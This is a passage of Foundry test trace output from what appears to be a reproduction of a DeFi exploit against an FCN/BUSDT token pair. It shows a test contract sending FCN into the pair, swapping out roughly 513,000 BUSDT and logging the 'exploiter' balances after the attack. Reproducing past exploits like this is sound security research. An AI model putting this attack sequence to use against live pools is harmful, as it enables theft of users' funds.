    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000006cbb2cbe1ad26063576f → 0x000000000000000000000000000000000000000000006a9d12dd5117ae23576f
    │   │   │   └─ ← [Return] true
    │   │   ├─ [15385] FCN::transfer(FCN_BUSDT: [0xACB496dd4A8b6B9D1B99D422b8700F6EF932Bc10], 100000000000000000000 [1e20])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 15000000000000000000 [1.5e19])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: FCN_BUSDT: [0xACB496dd4A8b6B9D1B99D422b8700F6EF932Bc10], value: 85000000000000000000 [8.5e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x00000000000000000000000000000000000000000000000c3ed010102c04f8b4 → 0x000000000000000000000000000000000000000000000006d308b1e2c8f4f8b4
    │   │   │   │   @ 0x05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc: 0x0000000000000000000000000000000000000000000000000454926e49478de4 → 0x000000000000000000000000000000000000000000000000d47f46f518238de4
    │   │   │   │   @ 0x7d7d25be11e81131f4c4e2719ebb22d52b2f4e1b0a5c54ab02bd55ac4cfad485: 0x00000000000000000000000000000000000000000000000006f75c090bc9d8fa → 0x000000000000000000000000000000000000000000000004a29405af9ffdd8fa
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Stop]
    │   ├─ [626] FCN::balanceOf(FCN_BUSDT: [0xACB496dd4A8b6B9D1B99D422b8700F6EF932Bc10]) [staticcall]
    │   │   └─ ← [Return] 85501971077397338362 [8.55e19]
    │   ├─ [531] BUSDT::balanceOf(FCN_BUSDT: [0xACB496dd4A8b6B9D1B99D422b8700F6EF932Bc10]) [staticcall]
    │   │   └─ ← [Return] 10000020000000000000000 [1e22]
    │   ├─ emit Sync(reserve0: 85501971077397338362 [8.55e19], reserve1: 10000020000000000000000 [1e22])
    │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 85000000000000000000 [8.5e19], amount1In: 10000000000000000000000 [1e22], amount0Out: 0, amount1Out: 512963341056079475662703 [5.129e23], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 9: 0x00000000000000000000000000379a6ee4e66e406fcb040b4f333251600a5d50 → 0x0000000000000000000000000037ae78f7cfbd6a139c013f2208ebbd8af47793
    │   │   @ 8: 0x6569c003000000006c9fccad8c234e505f6f00000000000006f75c090bc9d8fa → 0x6569c14c00000000021e1a27d79f91c20000000000000004a29405af9ffdd8fa
    │   │   @ 10: 0x000000000000000000000000000000000000eaa30f87f7c6891ec284dc3908b0 → 0x000000000000000000000000000000000000eab828f41b17de1d21aa13c22983
    │   └─ ← [Stop]
    ├─ [531] BUSDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 503468345335579475662703 [5.034e23]
    ├─ [425] BUSDT::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Exploiter BUSDT balance after attack", val: 503468345335579475662703 [5.034e23], decimals: 18)
    ├─ [626] FCN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 125887064171666012340 [1.258e20]
    ├─ [295] FCN::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Exploiter FCN balance after attack", val: 125887064171666012340 [1.258e20], decimals: 18)
    ├─  storage changes:
    │   @ 0x0c13c07a5b4ccebad5f446f0446b987779e927c5af2382d3b3699f0c55adb527: 0 → 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4
    │   @ 0x48daa37823a4a6aaa0950c817e29c013b93b366112361cd04cf01d10b3af430b: 0 → 1
    │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0 → 0x0000000000000000000000000000000000000000000000a5e207db6cd7502f98
    │   @ 0x0c13c07a5b4ccebad5f446f0446b987779e927c5af2382d3b3699f0c55adb52a: 0 → 1
    │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000013d054d97f7d45fffff
    │   @ 0xc284eaaf6ee9391b04b3cd7993d3abe3d5636b666fb8a699b77a6cb5d215fc4a: 0 → 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4
    │   @ 0xc284eaaf6ee9391b04b3cd7993d3abe3d5636b666fb8a699b77a6cb5d215fc4d: 0 → 1
    │   @ 0x32441a8c758f8a3d96e739489011c27f89eb5e6cc577faf91661a65cb6e43a52: 0 → 1
    │   @ 0x731690c0c9444ec9e22d10a03691d3cfad019fc637ec835532f014c28f27a5f6: 0 → 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a
    │   @ 0x32441a8c758f8a3d96e739489011c27f89eb5e6cc577faf91661a65cb6e43a4f: 0 → 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c
    │   @ 0x731690c0c9444ec9e22d10a03691d3cfad019fc637ec835532f014c28f27a5f9: 0 → 1
    │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000016fe6708b439b0000 → 0x00000000000000000000000000000000000000000000003ff7e88c750b91f000
    │   @ 0x48daa37823a4a6aaa0950c817e29c013b93b366112361cd04cf01d10b3af4308: 0 → 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96
    │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0 → 0x0000000000000000000000000000000000000000000000000000accdd281e000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 35.65s (34.32s CPU time)

Ran 2 test suites in 38.16s (36.23s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
